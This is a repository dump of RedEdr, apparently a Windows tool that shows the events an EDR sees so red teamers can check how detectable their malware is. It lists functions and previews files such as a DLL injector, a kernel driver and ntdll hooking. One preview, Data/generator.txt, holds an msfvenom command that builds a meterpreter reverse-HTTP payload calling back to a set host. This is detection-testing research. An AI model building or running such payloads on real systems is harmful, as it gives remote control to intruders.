function JSON_HEDLEY_WARN_UNUSED_RESULT (line 23769) | JSON_HEDLEY_WARN_UNUSED_RESULT
function JSON_HEDLEY_WARN_UNUSED_RESULT (line 23784) | JSON_HEDLEY_WARN_UNUSED_RESULT
function basic_json (line 23799) | static basic_json from_msgpack(const T* ptr, std::size_t len,
function basic_json (line 23808) | static basic_json from_msgpack(detail::span_input_adapter&& i,
function JSON_HEDLEY_WARN_UNUSED_RESULT (line 23823) | JSON_HEDLEY_WARN_UNUSED_RESULT
function JSON_HEDLEY_WARN_UNUSED_RESULT (line 23838) | JSON_HEDLEY_WARN_UNUSED_RESULT
function basic_json (line 23853) | static basic_json from_ubjson(const T* ptr, std::size_t len,
function basic_json (line 23862) | static basic_json from_ubjson(detail::span_input_adapter&& i,
function JSON_HEDLEY_WARN_UNUSED_RESULT (line 23877) | JSON_HEDLEY_WARN_UNUSED_RESULT
function JSON_HEDLEY_WARN_UNUSED_RESULT (line 23892) | JSON_HEDLEY_WARN_UNUSED_RESULT
function JSON_HEDLEY_WARN_UNUSED_RESULT (line 23907) | JSON_HEDLEY_WARN_UNUSED_RESULT
function JSON_HEDLEY_WARN_UNUSED_RESULT (line 23922) | JSON_HEDLEY_WARN_UNUSED_RESULT
function basic_json (line 23937) | static basic_json from_bson(const T* ptr, std::size_t len,
function basic_json (line 23946) | static basic_json from_bson(detail::span_input_adapter&& i,
function reference (line 23968) | reference operator[](const json_pointer& ptr)
function reference (line 23975) | reference operator[](const ::nlohmann::json_pointer<BasicJsonType>& ptr)
function const_reference (line 23982) | const_reference operator[](const json_pointer& ptr) const
function const_reference (line 23989) | const_reference operator[](const ::nlohmann::json_pointer<BasicJsonType>...
function reference (line 23996) | reference at(const json_pointer& ptr)
function reference (line 24003) | reference at(const ::nlohmann::json_pointer<BasicJsonType>& ptr)
function const_reference (line 24010) | const_reference at(const json_pointer& ptr) const
function const_reference (line 24017) | const_reference at(const ::nlohmann::json_pointer<BasicJsonType>& ptr) c...
function basic_json (line 24024) | basic_json flatten() const
function basic_json (line 24033) | basic_json unflatten() const
function patch_inplace (line 24049) | void patch_inplace(const basic_json& json_patch)
function basic_json (line 24320) | basic_json patch(const basic_json& json_patch) const
function JSON_HEDLEY_WARN_UNUSED_RESULT (line 24329) | JSON_HEDLEY_WARN_UNUSED_RESULT
function merge_patch (line 24472) | void merge_patch(const basic_json& apply_patch)
function NLOHMANN_BASIC_JSON_TPL_DECLARATION (line 24503) | NLOHMANN_BASIC_JSON_TPL_DECLARATION
function NLOHMANN_JSON_NAMESPACE_END (line 24540) | NLOHMANN_JSON_NAMESPACE_END
FILE: RedEdrShared/loguru.cpp
type FileAbs (line 147) | struct FileAbs
type stat (line 152) | struct stat
type Callback (line 161) | struct Callback
function terminal_has_color (line 257) | bool terminal_has_color() { return s_terminal_has_color; }
function FILE (line 289) | inline FILE* to_file(void* user_data) { return reinterpret_cast<FileAbs*...
function FILE (line 291) | inline FILE* to_file(void* user_data) { return reinterpret_cast<FILE*>(u...
function file_log (line 294) | void file_log(void* user_data, const Message& message)
function file_close (line 323) | void file_close(void* user_data)
function file_flush (line 334) | void file_flush(void* user_data)
function file_reopen (line 341) | void file_reopen(void* user_data)
function syslog_log (line 379) | void syslog_log(void* /*user_data*/, const Message& message)
function syslog_close (line 407) | void syslog_close(void* /*user_data*/)
function syslog_flush (line 412) | void syslog_flush(void* /*user_data*/)
function Text (line 421) | Text vtextprintf(const char* format, fmt::format_args args)
function Text (line 427) | static Text vtextprintf(const char* format, va_list vlist)
function Text (line 443) | Text textprintf(const char* format, ...)
function Text (line 454) | Text textprintf()
function parse_args (line 473) | static void parse_args(int& argc, char* argv[], const char* verbosity_flag)
function now_ns (line 526) | static long long now_ns()
function on_atexit (line 544) | static void on_atexit()
function write_hex_digit (line 552) | static void write_hex_digit(std::string& out, unsigned num)
function write_hex_byte (line 559) | static void write_hex_byte(std::string& out, uint8_t n)
function escape (line 565) | static void escape(std::string& out, const std::string& str)
function Text (line 588) | Text errno_as_text()
function init (line 607) | void init(int& argc, char* argv[], const Options& options)
function shutdown (line 682) | void shutdown()
function write_date_time (line 691) | void write_date_time(char* buff, unsigned long long buff_size)
function suggest_log_path (line 737) | void suggest_log_path(const char* prefix, char* buff, unsigned long long...
function add_file (line 799) | bool add_file(const char* path_in, FileMode mode, Verbosity verbosity)
type loguru (line 1931) | namespace loguru {
function install_signal_handlers (line 1932) | void install_signal_handlers(const SignalOptions& signal_options)
function write_to_stderr (line 1943) | void write_to_stderr(const char* data, size_t size)
function write_to_stderr (line 1949) | void write_to_stderr(const char* data)
function call_default_signal_handler (line 1954) | void call_default_signal_handler(int signal_number)
function signal_handler (line 1964) | void signal_handler(int signal_number, siginfo_t*, void*)
function install_signal_handlers (line 2024) | void install_signal_handlers(const SignalOptions& signal_options)
type loguru (line 1941) | namespace loguru
function install_signal_handlers (line 1932) | void install_signal_handlers(const SignalOptions& signal_options)
function write_to_stderr (line 1943) | void write_to_stderr(const char* data, size_t size)
function write_to_stderr (line 1949) | void write_to_stderr(const char* data)
function call_default_signal_handler (line 1954) | void call_default_signal_handler(int signal_number)
function signal_handler (line 1964) | void signal_handler(int signal_number, siginfo_t*, void*)
function install_signal_handlers (line 2024) | void install_signal_handlers(const SignalOptions& signal_options)
FILE: RedEdrShared/loguru.hpp
function LOGURU_ANONYMOUS_NAMESPACE_BEGIN (line 266) | LOGURU_ANONYMOUS_NAMESPACE_BEGIN
function LOGURU_ANONYMOUS_NAMESPACE_BEGIN (line 1225) | LOGURU_ANONYMOUS_NAMESPACE_BEGIN
FILE: RedEdrShared/mypeb.h
type API_SET_NAMESPACE (line 13) | typedef struct _API_SET_NAMESPACE
type API_SET_HASH_ENTRY (line 25) | typedef struct _API_SET_HASH_ENTRY
type API_SET_NAMESPACE_ENTRY (line 32) | typedef struct _API_SET_NAMESPACE_ENTRY
type API_SET_VALUE_ENTRY (line 43) | typedef struct _API_SET_VALUE_ENTRY
type TELEMETRY_COVERAGE_HEADER (line 53) | typedef struct _TELEMETRY_COVERAGE_HEADER
type _RTL_BITMAP (line 75) | struct _RTL_BITMAP
type _RTL_USER_PROCESS_PARAMETERS (line 77) | struct _RTL_USER_PROCESS_PARAMETERS
type _RTL_CRITICAL_SECTION (line 78) | struct _RTL_CRITICAL_SECTION
type _SILO_USER_SHARED_DATA (line 79) | struct _SILO_USER_SHARED_DATA
type _LEAP_SECOND_DATA (line 80) | struct _LEAP_SECOND_DATA
type ULONG (line 85) | typedef ULONG GDI_HANDLE_BUFFER[GDI_HANDLE_BUFFER_SIZE];
type ACTIVATION_CONTEXT_DATA (line 87) | typedef struct _ACTIVATION_CONTEXT_DATA
type ASSEMBLY_STORAGE_MAP_ENTRY (line 100) | typedef struct _ASSEMBLY_STORAGE_MAP_ENTRY
type ASSEMBLY_STORAGE_MAP (line 107) | typedef struct _ASSEMBLY_STORAGE_MAP
type CURDIR (line 116) | typedef struct _CURDIR
type RTL_DRIVE_LETTER_CURDIR (line 122) | typedef struct _RTL_DRIVE_LETTER_CURDIR
type MY_RTL_USER_PROCESS_PARAMETERS (line 132) | typedef struct _MY_RTL_USER_PROCESS_PARAMETERS
type MYPEB (line 185) | typedef struct _MYPEB
FILE: RedEdrShared/myprocess.cpp
function GetProcessNameByPid (line 19) | std::wstring GetProcessNameByPid(DWORD pid) {
function Process (line 133) | Process* MakeProcess(DWORD pid, std::vector<std::string> targetNames) {
function BOOL (line 159) | BOOL Process::OpenTarget() {
function BOOL (line 169) | BOOL Process::CloseTarget() {
function HANDLE (line 178) | HANDLE Process::GetHandle() {
function BOOL (line 203) | BOOL Process::doObserve() {
FILE: RedEdrShared/myprocess.h
function class (line 11) | class Process {
FILE: RedEdrShared/piping.cpp
function BOOL (line 33) | BOOL PipeServer::StartAndWaitForClient(BOOL allow_all) {
function BOOL (line 41) | BOOL PipeServer::Start(BOOL allow_all) {
function BOOL (line 102) | BOOL PipeServer::WaitForClient() {
function BOOL (line 126) | BOOL PipeServer::Send(char* buffer) {
function BOOL (line 173) | BOOL PipeServer::Receive(char* buffer, size_t buffer_len) {
function BOOL (line 276) | BOOL PipeServer::IsConnected() {
function BOOL (line 293) | BOOL PipeClient::Connect(const wchar_t *pipe_path) {
function BOOL (line 329) | BOOL PipeClient::Send(char* buffer) {
function BOOL (line 376) | BOOL PipeClient::Receive(char* buffer, size_t buffer_len) {
FILE: RedEdrShared/piping.h
function class (line 11) | class PipeServer {
function class (line 40) | class PipeClient {
FILE: RedEdrShared/process_mem_static.cpp
function BOOL (line 25) | BOOL MemStatic::ExistMemoryRegion(uint64_t addr) {
function MemoryRegion (line 30) | MemoryRegion* MemStatic::GetMemoryRegion(uint64_t addr) {
FILE: RedEdrShared/process_mem_static.h
function class (line 12) | class MemoryRegion {
function class (line 25) | class MemStatic {
FILE: RedEdrShared/process_query.cpp
type _MEMORY_INFORMATION_CLASS (line 34) | enum _MEMORY_INFORMATION_CLASS {
function BOOL (line 57) | BOOL InitProcessQuery() {
function GetProcessName (line 73) | std::wstring GetProcessName(HANDLE hProcess) {
function ProcessPebInfoRet (line 93) | ProcessPebInfoRet ProcessPebInfo(HANDLE hProcess) {
function ReadMemoryAsWString (line 171) | std::wstring ReadMemoryAsWString(HANDLE hProcess, LPCVOID remoteAddress,...
function ProcessEnumerateModules (line 200) | std::vector<ProcessLoadedDll> ProcessEnumerateModules(HANDLE hProcess) {
function GetSectionNameFromRaw (line 295) | std::string GetSectionNameFromRaw(const IMAGE_SECTION_HEADER& section) {
function EnumerateModuleSections (line 301) | std::vector<ModuleSection> EnumerateModuleSections(HANDLE hProcess, LPVO...
function ProcessAddrInfoRet (line 405) | ProcessAddrInfoRet ProcessAddrInfo(HANDLE hProcess, PVOID address) {
function QueryMemoryRegions (line 441) | bool QueryMemoryRegions(HANDLE hProcess) {
function GetRemoteUnicodeStr (line 487) | std::string GetRemoteUnicodeStr(HANDLE hProcess, UNICODE_STRING* u) {
function wchar_t (line 522) | wchar_t* GetFileNameFromPath(wchar_t* path) {
function DWORD (line 531) | DWORD FindProcessIdByName(const std::wstring& processName) {
FILE: RedEdrShared/process_query.h
type ProcessAddrInfoRet (line 13) | struct ProcessAddrInfoRet {
type ProcessPebInfoRet (line 33) | struct ProcessPebInfoRet {
type ProcessLoadedDll (line 46) | struct ProcessLoadedDll {
type ModuleSection (line 54) | struct ModuleSection {
FILE: RedEdrShared/process_resolver.cpp
function BOOL (line 52) | BOOL ProcessResolver::containsObject(DWORD pid) {
function Process (line 71) | Process* ProcessResolver::getObject(DWORD id) {
function BOOL (line 120) | BOOL ProcessResolver::PopulateAllProcesses() {
FILE: RedEdrShared/process_resolver.h
function class (line 12) | class ProcessResolver {
FILE: RedEdrShared/ranges.h
function class (line 10) | class Range {
function contains (line 16) | bool contains(uint64_t value) const {
function overlaps (line 20) | bool overlaps(const Range& other) const {
function Range (line 24) | Range intersect(const Range& other) const {
function Range (line 30) | Range merge(const Range& other) const {
function is_adjacent (line 47) | bool is_adjacent(const Range& other) const {
function class (line 53) | class RangeSet {
function Range (line 69) | const Range* get(uint64_t value) const {
FILE: RedEdrShared/utils.cpp
function PrintWcharBufferAsHex (line 15) | void PrintWcharBufferAsHex(const wchar_t* buffer, size_t bufferSize) {
function wchar_t (line 31) | wchar_t* wstring2wcharAlloc(const std::wstring& str) {
function pointer_to_uint64 (line 39) | uint64_t pointer_to_uint64(PVOID ptr) {
function PVOID (line 43) | PVOID uint64_to_pointer(uint64_t i) {
function wchar2string (line 48) | std::string wchar2string(const wchar_t* wideString) {
function get_time (line 62) | uint64_t get_time() {
function to_lowercase (line 78) | std::wstring to_lowercase(const std::wstring& str) {
function to_lowercase2 (line 84) | std::string to_lowercase2(const std::string& str) {
function remove_all_occurrences_case_insensitive (line 92) | void remove_all_occurrences_case_insensitive(std::string& str, const std...
function ReplaceAll (line 104) | std::wstring ReplaceAll(std::wstring str, const std::wstring& from, cons...
function contains_case_insensitive (line 114) | bool contains_case_insensitive(const std::string& haystack, const std::s...
function ends_with_case_insensitive (line 121) | bool ends_with_case_insensitive(const std::string& str, const std::strin...
function wchar_t (line 132) | wchar_t* string2wcharAlloc(const std::string& str) {
function wstring2string (line 148) | std::string wstring2string(std::wstring& wide_string) {
function read_file (line 173) | std::string read_file(const std::string& path) {
function write_file (line 185) | void write_file(std::string path, std::string data) {
function get_time_for_file (line 196) | std::string get_time_for_file() {
function GetSectionPermissions (line 273) | std::string GetSectionPermissions(DWORD characteristics) {
function wchar_t (line 365) | wchar_t* GetMemoryPermissions_Unused(wchar_t* buf, DWORD protection) {
function wchar_t (line 383) | wchar_t* JsonEscape(wchar_t* str, size_t buffer_size) {
function DWORD (line 413) | DWORD StartProcessInBackground(LPCWSTR exePath, LPCWSTR commandLine) {
function wchar_t (line 456) | wchar_t* char2wcharAlloc(const char* charStr) {
function string2wstring (line 471) | std::wstring string2wstring(const std::string& str) {
function wstring_starts_with (line 483) | bool wstring_starts_with(const std::wstring& str, const std::wstring& pr...
FILE: RedEdrTester/RedEdrTester.cpp
function SendToKernel (line 35) | void SendToKernel(int enable, char* target) {
function SendToKernelReader (line 41) | void SendToKernelReader(char* data) {
function SendToDllReader (line 49) | void SendToDllReader(char* data) {
function processinfo (line 57) | void processinfo(char* pidStr) {
function DoStuff (line 101) | void DoStuff() {
function AnalyzeFile (line 139) | void AnalyzeFile(char *fname) {
function test (line 169) | void test() {
function main (line 173) | int main(int argc, char* argv[]) {
FILE: Shared/common.h
type MY_DRIVER_DATA (line 20) | typedef struct _MY_DRIVER_DATA {
FILE: UnitTests/UnitTestAnalyzer.cpp
type UnitTests (line 12) | namespace UnitTests
function TEST_CLASS (line 14) | TEST_CLASS(AnalyzerTest)
FILE: UnitTests/UnitTestEventProducer.cpp
type UnitTests (line 13) | namespace UnitTests
function TEST_CLASS (line 15) | TEST_CLASS(EventProducerTest)
function TEST_METHOD (line 25) | TEST_METHOD(ConvertWstringToString2) {
FILE: UnitTests/UnitTestProcessInfo.cpp
type UnitTests (line 21) | namespace UnitTests
function TEST_CLASS (line 23) | TEST_CLASS(MemInfoTest)
function TEST_METHOD (line 46) | TEST_METHOD(MemInfoMultiple)
function TEST_METHOD (line 65) | TEST_METHOD(MemInfoUsage)
function TEST_CLASS (line 76) | TEST_CLASS(ProcessInfoTest)
function TEST_METHOD (line 105) | TEST_METHOD(TestProcessViaMakeProcess)
function TEST_METHOD (line 119) | TEST_METHOD(TestProcessNonObserverValidProcessViaMakeProcess)
function TEST_METHOD (line 132) | TEST_METHOD(TestProcessNonObserverInValidProcessViaMakeProcess)
FILE: UnitTests/UnitTestRanges.cpp
type RangeSetTests (line 8) | namespace RangeSetTests
function TEST_CLASS (line 10) | TEST_CLASS(RangeSetTests)
function TEST_METHOD (line 39) | TEST_METHOD(TestContains)
function TEST_METHOD (line 53) | TEST_METHOD(TestIntersection)
FILE: UnitTests/UnitTests.cpp
type UnitTests (line 7) | namespace UnitTests
function TEST_CLASS (line 9) | TEST_CLASS(UnitTests)
function TEST_METHOD (line 19) | TEST_METHOD(TestTranslate)
FILE: UnitTests/logging.cpp
function LOG_A (line 13) | void LOG_A(int verbosity, const char* format, ...)
function LOG_W (line 29) | void LOG_W(int verbosity, const wchar_t* format, ...)
FILE: elam_driver/elam_driver.c
function NTSTATUS (line 11) | NTSTATUS
[
{
"path": ".gitattributes",
"chars": 2518,
"preview": "###############################################################################\n# Set default behavior to automatically "
},
{
"path": ".gitignore",
"chars": 6252,
"preview": "## Ignore Visual Studio temporary files, build results, and\n## files generated by popular Visual Studio add-ons.\n##\n## G"
},
{
"path": "CLAUDE.md",
"chars": 1026,
"preview": "# RedEdr\n\nRedEdr will record the events generated by a process. Either its ETW (-TI) events, \nor use ntdll hooking to re"
},
{
"path": "Data/dostuff.events.json",
"chars": 111084,
"preview": "[{\"callback\":\"process_create\",\"id\":0,\"krn_pid\":8500,\"name\":\"\\\\Device\\\\HarddiskVolume2\\\\Users\\\\hacker\\\\source\\\\repos\\\\Red"
},
{
"path": "Data/generator.txt",
"chars": 609,
"preview": "# non-staged\nmsfvenom -a x64 -p windows/x64/meterpreter_reverse_http AUTOLOADSTDAPI=FALSE LPORT=8080 LHOST=10.10.10.107 "
},
{
"path": "Doc/api.md",
"chars": 3840,
"preview": "# RedEdr HTTP API Documentation\n\nThis document is AI generated but reviewed.\n\nRedEdr provides a REST API through an embe"
},
{
"path": "Doc/notes.md",
"chars": 1046,
"preview": "# Notes\n\n## Solutions\n\nRedEdr: \n* ETW reader\n* MPLOG reader\n* pipe-server for RedEdrDll (`pipe\\\\RedEdrDllCom`)\n* pipe-se"
},
{
"path": "LICENSE.txt",
"chars": 35149,
"preview": " GNU GENERAL PUBLIC LICENSE\n Version 3, 29 June 2007\n\n Copyright (C) 2007 Free "
},
{
"path": "README.md",
"chars": 13798,
"preview": "# RedEdr\n\nDisplay events from Windows to see the detection surface of your malware. Same data as an ETW-based EDR sees "
},
{
"path": "RedEdr/RedEdr.cpp",
"chars": 7956,
"preview": "\n#include <windows.h>\n#include <iostream>\n#include <vector>\n\n#include \"logging.h\"\n#include \"manager.h\"\n#include \"cxxops."
},
{
"path": "RedEdr/RedEdr.vcxproj",
"chars": 11310,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/msb"
},
{
"path": "RedEdr/RedEdr.vcxproj.filters",
"chars": 7253,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuil"
},
{
"path": "RedEdr/config.cpp",
"chars": 39,
"preview": "\n#include \"config.h\"\n\nConfig g_Config;\n"
},
{
"path": "RedEdr/config.h",
"chars": 1058,
"preview": "#pragma once\n#include <windows.h>\n#include <vector>\n#include <string>\n\n\nclass Config {\npublic:\n\tstd::vector<std::string>"
},
{
"path": "RedEdr/cxxops.hpp",
"chars": 81109,
"preview": "/*\n\nCopyright (c) 2014-2022 Jarryd Beck\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof"
},
{
"path": "RedEdr/design.css",
"chars": 1274,
"preview": "\nbody {\n font-family: \"Courier New\", Courier, monospace;\n margin: 0;\n padding: 0;\n}\nheader {\n background-col"
},
{
"path": "RedEdr/dllinjector.cpp",
"chars": 3675,
"preview": "#include <windows.h>\n\n#include \"dllinjector.h\"\n#include \"logging.h\"\n#include \"config.h\"\n\n\n// File mostly from MyDumbEdr\n"
},
{
"path": "RedEdr/dllinjector.h",
"chars": 121,
"preview": "#pragma once\n\n#include <windows.h>\n\n#define MESSAGE_SIZE 1024\n#define MAX_PATH 260\n\nBOOL remote_inject(DWORD target_pid)"
},
{
"path": "RedEdr/dllreader.cpp",
"chars": 6376,
"preview": "#include <windows.h>\n#include <iostream>\n#include <vector>\n#include <string>\n#include <cstdio>\n#include <thread>\n#includ"
},
{
"path": "RedEdr/dllreader.h",
"chars": 131,
"preview": "#pragma once\n\n#include <windows.h>\n#include <vector>\n\n\nbool DllReaderInit(std::vector<HANDLE>& threads);\nvoid DllReaderS"
},
{
"path": "RedEdr/etwreader.cpp",
"chars": 19523,
"preview": "#include <Windows.h>\n#include <iostream>\n#include <vector>\n#include <atomic>\n#include <krabs.hpp>\n#include \"json.hpp\"\n\n#"
},
{
"path": "RedEdr/etwreader.h",
"chars": 356,
"preview": "#pragma once\n\n#include <windows.h>\n#include <evntrace.h>\n#include <vector>\n\n\ntypedef void (WINAPI* EventRecordCallbackFu"
},
{
"path": "RedEdr/event_aggregator.cpp",
"chars": 1982,
"preview": "#include <iostream>\n#include <sstream>\n#include <vector>\n\n#include \"event_aggregator.h\"\n#include \"logging.h\"\n#include \"u"
},
{
"path": "RedEdr/event_aggregator.h",
"chars": 921,
"preview": "#pragma once\n\n#include <windows.h>\n#include <vector>\n#include <mutex>\n#include <atomic>\n\n\nclass EventAggregator {\npublic"
},
{
"path": "RedEdr/event_augmenter.cpp",
"chars": 1625,
"preview": "\n#include \"logging.h\"\n#include \"config.h\"\n#include \"json.hpp\"\n\n#include \"event_augmenter.h\"\n\n\n/* Augments the Event JSON"
},
{
"path": "RedEdr/event_augmenter.h",
"chars": 186,
"preview": "#pragma once\n\n#include \"json.hpp\"\n#include \"myprocess.h\"\n\n\nvoid AugmentEvent(nlohmann::json& j, Process *process);\nvoid "
},
{
"path": "RedEdr/event_processor.cpp",
"chars": 9597,
"preview": "#include <iostream>\n#include <sstream>\n#include <vector>\n\n#include \"process_resolver.h\"\n#include \"process_query.h\"\n#incl"
},
{
"path": "RedEdr/event_processor.h",
"chars": 947,
"preview": "#pragma once\n\n#include <windows.h>\n#include <vector>\n#include <string>\n#include <mutex>\n\n#include \"json.hpp\"\n#include \"m"
},
{
"path": "RedEdr/httplib.h",
"chars": 331603,
"preview": "//\n// httplib.h\n//\n// Copyright (c) 2024 Yuji Hirose. All rights reserved.\n// MIT License\n//\n\n#ifndef CPPHTTPLIB_HTTP"
},
{
"path": "RedEdr/index.html",
"chars": 7413,
"preview": "<!DOCTYPE html>\n<html lang=\"en\">\n<head>\n <meta charset=\"UTF-8\">\n <meta name=\"viewport\" content=\"width=device-width"
},
{
"path": "RedEdr/jsonw.hpp",
"chars": 53460,
"preview": "//\n// jsonw.hpp - single header c++ json library\n// See README.md for detail\n//\n#ifndef OCTILLION_JSONW_HEADER\n#define O"
},
{
"path": "RedEdr/kernelinterface.cpp",
"chars": 8585,
"preview": "#include <windows.h>\n#include <winioctl.h>\n#include \"../Shared/common.h\"\n\n#include \"logging.h\"\n#include \"config.h\"\n#incl"
},
{
"path": "RedEdr/kernelinterface.h",
"chars": 149,
"preview": "#pragma once\n\nBOOL ConfigureKernelDriver(int enable);\nBOOL LoadKernelDriver();\nBOOL UnloadKernelDriver();\nBOOL IsService"
},
{
"path": "RedEdr/kernelreader.cpp",
"chars": 4182,
"preview": "#include <windows.h>\n#include <iostream>\n#include <vector>\n#include <string>\n\n#include \"../Shared/common.h\"\n#include \"lo"
},
{
"path": "RedEdr/kernelreader.h",
"chars": 115,
"preview": "#pragma once\n\n#include <vector>\n\nbool KernelReaderInit(std::vector<HANDLE>& threads);\nvoid KernelReaderShutdown();\n"
},
{
"path": "RedEdr/logging.cpp",
"chars": 4532,
"preview": "#include <iostream>\n#include <windows.h>\n#include <vector>\n#include <string>\n#include <mutex>\n\n#include <chrono>\n#includ"
},
{
"path": "RedEdr/logging.h",
"chars": 232,
"preview": "#pragma once\n\n#include <vector>\n#include <string>\n\n#include \"../Shared/common.h\"\nvoid LOG_W(int verbosity, const wchar_t"
},
{
"path": "RedEdr/logreader.cpp",
"chars": 4500,
"preview": "#include <windows.h>\n#include <vector>\n#include <string>\n\n#include \"logging.h\"\n#include \"logreader.h\"\n#include \"utils.h\""
},
{
"path": "RedEdr/logreader.h",
"chars": 278,
"preview": "#pragma once\n\n#include <windows.h>\n#include <vector>\n#include <string>\n\n\nstd::wstring findFiles(const std::wstring& dire"
},
{
"path": "RedEdr/manager.cpp",
"chars": 7537,
"preview": "#include <windows.h>\n#include <iostream>\n#include <string>\n\n#include \"config.h\"\n#include \"etwreader.h\"\n#include \"kernelr"
},
{
"path": "RedEdr/manager.h",
"chars": 210,
"preview": "#pragma once\n\n#include <windows.h>\n#include <vector>\n#include <string>\n\nvoid ManagerShutdown();\nBOOL ManagerStart(std::v"
},
{
"path": "RedEdr/packages.config",
"chars": 155,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<packages>\n <package id=\"Microsoft.O365.Security.Krabsetw\" version=\"4.4.3\" targ"
},
{
"path": "RedEdr/pplmanager.cpp",
"chars": 11832,
"preview": "#include <stdio.h>\n#include <Windows.h>\n\n#include \"logging.h\"\n#include \"../Shared/common.h\"\n#include \"serviceutils.h\"\n#i"
},
{
"path": "RedEdr/pplmanager.h",
"chars": 359,
"preview": "#pragma once\n\n#include <Windows.h>\n#include <string>\n#include <vector>\n\nBOOL ConnectPplService();\nBOOL InstallElamCertPp"
},
{
"path": "RedEdr/pplreader.cpp",
"chars": 5062,
"preview": "\n#include <windows.h>\n#include <iostream>\n#include <vector>\n#include <string>\n\n#include \"../Shared/common.h\"\n#include \"l"
},
{
"path": "RedEdr/pplreader.h",
"chars": 212,
"preview": "#pragma once\n\n#include <windows.h>\n#include <vector>\n\n// PplReader: Consumes events from PPL service (ETW-TI data)\n\n// P"
},
{
"path": "RedEdr/privileges.cpp",
"chars": 8393,
"preview": "#include <iostream>\n#include <tchar.h>\n#include <windows.h>\n#include <wtsapi32.h>\n#include <sddl.h>\n\n#include \"logging.h"
},
{
"path": "RedEdr/privileges.h",
"chars": 293,
"preview": "#pragma once\n#include <windows.h>\n\nbool GetUserTokenForExecution(HANDLE& hTokenDup);\nbool EnablePrivilege(HANDLE hToken,"
},
{
"path": "RedEdr/serviceutils.cpp",
"chars": 1576,
"preview": "#include <windows.h>\n#include <iostream>\n\n#include \"serviceutils.h\"\n#include \"logging.h\"\n\nBOOL DoesServiceExist(LPCWSTR "
},
{
"path": "RedEdr/serviceutils.h",
"chars": 101,
"preview": "#pragma once\n\nBOOL IsServiceRunning(LPCWSTR driverName);\nBOOL DoesServiceExist(LPCWSTR serviceName);\n"
},
{
"path": "RedEdr/shared.js",
"chars": 3534,
"preview": "\n// Function to display events in Tab 1\nfunction displayEvents(events) {\n const eventContainer = document.getElementB"
},
{
"path": "RedEdr/webserver.cpp",
"chars": 12933,
"preview": "#include <iostream>\n#include <vector>\n#include <atomic>\n#include <windows.h>\n\n#include \"httplib.h\" // Needs to be on top"
},
{
"path": "RedEdr/webserver.h",
"chars": 185,
"preview": "#pragma once\n\n#include <Windows.h>\n#include <vector>\n\nDWORD WINAPI WebserverThread(LPVOID param);\nint InitializeWebServe"
},
{
"path": "RedEdr.sln",
"chars": 12956,
"preview": "\nMicrosoft Visual Studio Solution File, Format Version 12.00\n# Visual Studio Version 17\nVisualStudioVersion = 17.5.3353"
},
{
"path": "RedEdrDll/RedEdrDll.filters",
"chars": 2676,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuil"
},
{
"path": "RedEdrDll/RedEdrDll.vcxproj",
"chars": 9630,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/msb"
},
{
"path": "RedEdrDll/RedEdrDll.vcxproj.filters",
"chars": 944,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuil"
},
{
"path": "RedEdrDll/detours.h",
"chars": 43139,
"preview": "/////////////////////////////////////////////////////////////////////////////\n//\n// Core Detours Functionality (detours"
},
{
"path": "RedEdrDll/dllhelper.cpp",
"chars": 4777,
"preview": "#include \"dllhelper.h\"\n#include \"../Shared/common.h\"\n#include <dbghelp.h>\n#include <thread>\n#include <mutex>\n\n#include \""
},
{
"path": "RedEdrDll/dllhelper.h",
"chars": 306,
"preview": "#pragma once\n#include <windows.h>\n#include <winternl.h> // needs to be on bottom?\n// Pipe\nvoid InitDllPipe();\nvoid Send"
},
{
"path": "RedEdrDll/dllmain.cpp",
"chars": 68761,
"preview": "#include <Windows.h>\n#include \"../Shared/common.h\"\n#include <winternl.h> // needs to be on bottom?\n\n#include \"dllhelper"
},
{
"path": "RedEdrDll/framework.h",
"chars": 149,
"preview": "#pragma once\n\n#define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers\n// Windows Heade"
},
{
"path": "RedEdrDll/logging.cpp",
"chars": 788,
"preview": "#include <windows.h>\n#include <stdio.h>\n#include \"../Shared/common.h\"\n\nvoid LOG_A(int verbosity, const char* format, ..."
},
{
"path": "RedEdrDll/logging.h",
"chars": 151,
"preview": "#pragma once\n\n#include \"../Shared/common.h\"\nvoid LOG_W(int verbosity, const wchar_t* format, ...);\nvoid LOG_A(int verbos"
},
{
"path": "RedEdrDriver/Driver.c",
"chars": 11872,
"preview": "#include <Ntifs.h>\n#include <ntddk.h>\n\n// Needs to be set on the project properties as well\n#pragma comment(lib, \"FltMgr"
},
{
"path": "RedEdrDriver/MyDumbEDRDriver.inf",
"chars": 2339,
"preview": ";\n; MyDumbEDRDriver.inf\n;\n\n[Version]\nSignature=\"$WINDOWS NT$\"\nClass=System ; TODO: specify appropriate Class\nClassGuid={"
},
{
"path": "RedEdrDriver/RedEdrDriver.inf",
"chars": 2246,
"preview": ";\n; RedEdrDriver.inf\n;\n\n[Version]\nSignature=\"$WINDOWS NT$\"\nClass=System ; TODO: specify appropriate Class\nClassGuid={4d3"
},
{
"path": "RedEdrDriver/RedEdrDriver.vcxproj",
"chars": 6135,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" ToolsVersion=\"12.0\" xmlns=\"http://schemas.micros"
},
{
"path": "RedEdrDriver/RedEdrDriver.vcxproj.filters",
"chars": 2337,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuil"
},
{
"path": "RedEdrDriver/hashcache.c",
"chars": 3255,
"preview": "#include <Ntifs.h>\n#include <ntddk.h>\n\n#include \"hashcache.h\"\n\n\nPHASH_ENTRY HashTable[HASH_TABLE_SIZE];\nKSPIN_LOCK HashT"
},
{
"path": "RedEdrDriver/hashcache.h",
"chars": 736,
